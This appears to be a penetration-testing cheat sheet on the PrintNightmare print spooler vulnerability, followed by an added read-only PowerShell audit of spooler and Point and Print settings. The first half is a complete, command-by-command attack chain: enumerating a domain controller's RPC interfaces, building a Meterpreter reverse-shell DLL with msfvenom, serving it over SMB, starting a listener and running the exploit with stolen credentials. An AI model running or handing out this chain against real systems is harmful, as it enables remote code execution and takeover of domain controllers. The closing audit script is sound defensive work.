# PrintNightmare

1\) Clone the exploit repository.

```shell
git clone https://github.com/cube0x0/CVE-2021-1675.git
```

Check whether the target is vulnerable. The exploit relies on the print spooler RPC interfaces being exposed; the target is a candidate if the RPC endpoint mapper lists either of these:

* Print System Asynchronous Protocol (MS-PAR).
* Print System Remote Protocol (MS-RPRN).

```shell
rpcdump.py @<IP-address-DC> | egrep 'MS-PAR|MS-RPRN'
```

2\) Generate the DLL payload.

```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-local-port> -f dll > script.dll
```

3\) Create the SMB share that hosts the DLL.

```shell
smbserver.py -smb2support share script.dll
```

4\) Set up the reverse shell listener (multi/handler).

```shell
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker-IP-address>
set LPORT <listen-local-port>
run -j
```

5\) Run the exploit and catch the reverse shell.

```shell
CVE-2021-1675.py <ACME.LOCAL>/<user>:<password>@<IP-address-DC> '\\<attacker-IP-address>\share\script.dll'
```
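From the defender's side, the same weakness is closed by stopping the spooler where it is not needed and by restricting Point and Print driver installation. The following PowerShell audit is an added example, not code from the original page or from the exploit repository above; it assumes the registry path and value names from Microsoft's KB5005652 guidance for the PointAndPrint policy key and is meant to be run locally in an elevated shell on the host being checked.

```powershell
# Added example (not from the original page): audit a Windows host for the
# PrintNightmare-related hardening Microsoft documented in KB5005652.
# Assumption: the PointAndPrint policy key and value names below match that guidance.

$findings = @()

# 1. Spooler service. If it is stopped and disabled, the MS-RPRN / MS-PAR
#    interfaces the exploit relies on are not reachable over RPC.
$spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
if ($null -eq $spooler) {
    $findings += 'Spooler service is not present on this host'
} elseif ($spooler.Status -eq 'Running') {
    $findings += "Spooler is running (StartType: $($spooler.StartType)); disable it where printing is not required"
}

# 2. Point and Print policy values.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$pp  = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

# Return the DWORD value if it is set, otherwise $null (value absent or key missing).
function Get-DwordOrNull($obj, $name) {
    if ($null -ne $obj -and $null -ne $obj.PSObject.Properties[$name]) { return [int]$obj.$name }
    return $null
}

$restrict = Get-DwordOrNull $pp 'RestrictDriverInstallationToAdministrators'
$noWarn   = Get-DwordOrNull $pp 'NoWarningNoElevationOnInstall'
$update   = Get-DwordOrNull $pp 'UpdatePromptSettings'

# Patched builds behave as if RestrictDriverInstallationToAdministrators were 1
# when the value is absent; an explicit 0 re-enables non-admin driver installation.
if ($restrict -eq 0) {
    $findings += 'RestrictDriverInstallationToAdministrators is 0 (non-administrators may install printer drivers)'
}
# Either of these set to 1 suppresses the warning/elevation prompt on driver install.
if ($noWarn -eq 1) { $findings += 'NoWarningNoElevationOnInstall is 1' }
if ($update -eq 1) { $findings += 'UpdatePromptSettings is 1' }

if ($findings.Count -eq 0) {
    Write-Output 'No PrintNightmare-related weaknesses found in spooler state or Point and Print policy.'
} else {
    Write-Output 'Findings:'
    $findings | ForEach-Object { Write-Output " - $_" }
}
```

The script only reads service state and policy values; it changes nothing. Where the spooler must stay running (print servers), the policy values are the control that matters, and a finding of an explicit `0` on `RestrictDriverInstallationToAdministrators` is the one to escalate first.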
